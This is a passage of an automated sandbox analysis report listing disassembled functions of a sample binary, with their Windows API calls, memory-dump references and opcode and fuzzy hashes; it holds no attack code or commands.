                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Proc$Parent
                                                • String ID:
                                                • API String ID: 2351499541-0
                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchTranslate
                                                • String ID:
                                                • API String ID: 1795658109-0
                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                • GetCaretPos.USER32(?), ref: 004743B2
                                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                • GetForegroundWindow.USER32 ref: 004743EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                • _wcslen.LIBCMT ref: 00449519
                                                • _wcslen.LIBCMT ref: 00449526
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 2886238975-0
                                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __setmode$DebugOutputString_fprintf
                                                • String ID:
                                                • API String ID: 1792727568-0
                                                • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                • String ID: cdecl
                                                • API String ID: 3850814276-3896280584
                                                • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                • _memmove.LIBCMT ref: 0046D475
                                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 2502553879-0
                                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32 ref: 00448C69
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow
                                                • String ID:
                                                • API String ID: 312131281-0
                                                • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastacceptselect
                                                • String ID:
                                                • API String ID: 385091864-0
                                                • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                • GetStockObject.GDI32(00000011), ref: 00430258
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$CreateMessageObjectSendShowStock
                                                • String ID:
                                                • API String ID: 1358664141-0
                                                • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • __wsplitpath.LIBCMT ref: 00433950
                                                • __wcsicoll.LIBCMT ref: 00433974
                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                • String ID:
                                                • API String ID: 1187119602-0
                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
